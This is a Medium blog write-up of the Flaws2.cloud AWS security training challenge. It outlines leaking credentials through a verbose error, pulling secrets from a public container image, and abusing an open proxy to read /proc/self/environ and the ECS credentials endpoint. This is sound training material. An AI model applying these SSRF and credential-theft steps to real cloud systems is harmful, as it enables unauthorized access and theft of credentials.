Open in app

Sign in

Write

Sign in

Flaws2.Cloud Write Up

CyberQueenMeg
2 min readJun 13, 2023

Recently, I completed the Flaws2.cloud challenge for my role as a Cloud Penetration Testing Intern at Cisco. This was a wonderful challenge that taught me a lot about the importance of proper AWS permissions and security measures. I describe how I did each of the three challenges below.

Level 1: For this level, you’ll need to enter the correct PIN code. The correct PIN is 100 digits long, so brute forcing it won’t help.

Level Explanation

  • Input validation is with front-end JavaScript
  • Go to Inspector and look at the Network tab, you will get a domain that looks like 2rfismmoo8[.]execute-api.us-east-1[.]amazonaws[.]com/default/level1?code=1234
  • Change to 2rfismmoo8[.]execute-api.us-east-1[.]amazonaws[.]com/default/level1?code=a
  • Inspect the error message in raw data mode, it dumps the environmental variables
  • Create temporary security credentials in environment variables in Kali
  • Enumerate the contents of the s3 bucket at the domain to see if a static website is there
  • You will find a file labeled secret and when you go there you get the level 2 link

Level 2: This next level is running as a container at container[.]target[.]flaws2[.]cloud/. Just like S3 buckets, other resources on AWS can have open permissions. I’ll give you a hint that the ECR (Elastic Container Registry) is named “level2”.

Level Explanation

  • View the ECR images
  • Get the account id (use l1 creds):
  • List the images in the repository
  • Get the image in the repository and get the digest hash
  • Get the image download url from the digest hash
  • Go to the downloaded file, you will find the created credentials
  • Enter those credentials on the website and you will get the url to Level 3

Level 3: The container’s webserver you got access to includes a simple proxy that can be access with: container[.]target.flaws2[.]cloud/proxy/http://flaws[.]cloud or container[.]target[.]flaws2[.]cloud/proxy/http://neverssl[.]com

Level Explanation

  • We know that containers on ECS store their credentials at 169[.]254[.]170[.]2/v2/credentials/GUID
  • The GUID is taken from an environment variable named AWS_CONTAINER_CREDENTIALS_RELATIVE_URI which can be found at /proc/self/environ on Linux systems
  • With the proxy, we can navigate to container[.]target[.]flaws2[.]cloud/proxy/file:///proc/self/environ and enumerate our GUID
  • With the GUID, we navigate to container[.]target[.]flaws2[.]cloud/proxy/http://169[.]254[.]170[.]2/v2/credentials/GUID
  • Get the leaked credentials and use it to list s3 buckets
  • Navigate to the leaked url for the end

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Cloud
Cloud Computing
AWS
Cybersecurity
Hacking
CyberQueenMeg
CyberQueenMeg

Written by CyberQueenMeg

59 Followers
28 Following

GCU ‘25. DFIR Intern @ Cisco, Cybersecurity/tech nerd, musician (violin, piano, & guitar), Christian, and bug bounty hunter.

No responses yet

Write a response

What are your thoughts?

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams